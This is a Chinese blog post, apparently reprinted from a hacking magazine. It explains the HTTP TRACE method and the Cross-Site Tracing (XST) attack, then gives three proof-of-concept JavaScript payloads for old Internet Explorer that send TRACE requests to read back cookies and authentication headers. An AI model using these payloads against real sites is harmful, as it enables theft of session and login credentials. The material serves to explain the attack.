Chinaunix首页 | 论坛 | 博客
  • 博客访问: 1611622
  • 博文数量: 695
  • 博客积分: 0
  • 博客等级: 民兵
  • 技术积分: 4027
  • 用 户 组: 普通用户
  • 注册时间: 2013-11-20 21:22
文章分类

全部博文(695)

文章存档

2018年(18)

2017年(74)

2016年(170)

2015年(102)

2014年(276)

2013年(55)

分类: 网络与安全

2016-03-23 15:25:58

TRACE方法是用来调用一个远程的请求信息应用程序层的循环后退。最后的请求容器应该像一个200回复实体主体那样反映顾客接受返回的信息。最后的容器 或者是原服务器或者是第一代理器或接收在请求中一个Max-Forwards 零数位的网关(参见14.31节)。一个TRACE请求一定不包含一个实体。

  TRACE允许顾客看到通过请求链的那一端在接收了些什么并使用那些数据来测试和诊断信息情况。通过标题区的确切涵义(14.44节)是有特殊的厉害 关系,因为他扮演了一个请求链追踪器的角色。Max-Forwards 标题区的使用允许顾客限制请求链的长度,这对测试一个以无限循环来转寄消息的代理器来说很有用。

  如果成功的话,回复应该包含一个完整的在实体主体中的请求信息,并显示一个“MASSAGE/HTTP”目录。此方法下的回复不能缓存。

注意:文章已经发表于8期黑客防线,版权归其所

XST攻击描述:
攻击者将恶意代码嵌入一台已经被控制的主机上的web文件,当访问者浏览时恶意代码在浏览器中执行,然后访问者的cookie、http基本验证以及ntlm验证信息将被发送到已经被控制的主机,同时传送Trace请求给目标主机,导致cookie欺骗或者是中间人攻击。

XST攻击条件:
1、需要目标web服务器允许Trace参数;
2、需要一个用来插入XST代码的地方;
3、目标站点存在跨域漏洞。

XST与XSS的比较:
相同点:都具有很大的欺骗性,可以对受害主机产生危害,而且这种攻击是多平台多技术的,我们还可以利用Active控件、Flash、Java等来进行XST和XSS攻击。
优点:可以绕过一般的http验证以及NTLM验证

如何利用:

点击(此处)折叠或打开

  1. 手法1:
  2. 复制内容到剪贴板
  3. 代码:
  4. <SCRIPT type=text/java script><br><!--<br>function xssTRACE(){<br>var xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");<br>xmlHttp.open("TRACE","[url][/url]",false);<br>xmlHttp.send();<br>xmlDoc=xmlHttp.responseText;<br>alert(xmlDoc);<br>}<br><br>//-->




  5. 手法2:
  6. 复制内容到剪贴板
  7. 代码:
  8. <SCRIPT type=text/java script><br><!--<br>function xssTRACE() {<br>var openWin=open("blank.htm","swords","width=500,height=400");<br>var otraceswords=openWin.external;<br>openWin.location.href="[url][/url]";<br>setTimeout(<br>function () {<br>//以下必须写在一行
    otraceswords.NavigateAndFind('java script:xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE","[url][/url]",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;alert("不用document.cookie 显示站点wmjie.51.net/swords/ 的头信息。\\n" + xmlDoc);',"","");
    },
    1024
    );
    }
    //-->




  9. 手法3:
  10. 复制内容到剪贴板
  11. 代码:
  12. <SCRIPT type=text/java script><br>function xssTRACE(){<br>var swords = "var xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\")\;xmlHttp.open(\"TRACE\",\"[url][/url]\",false)\;xmlHttp.send()\;xmlDoc=xmlHttp.responseText\;alert(xmlDoc)\;";<br>var target = "[url][/url]";<br>spinach = encodeURIComponent(swords + ';top.close()');<br>var readyCode = 'font-size:expression(execScript(decodeURIComponent("' + spinach + '")))';<br>showModalDialog(target, null, readyCode);<br>}<br></SCRIPT> <BR><INPUT onclick=xssTRACE() type=button value="XSS TRACE">


阅读(1004) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~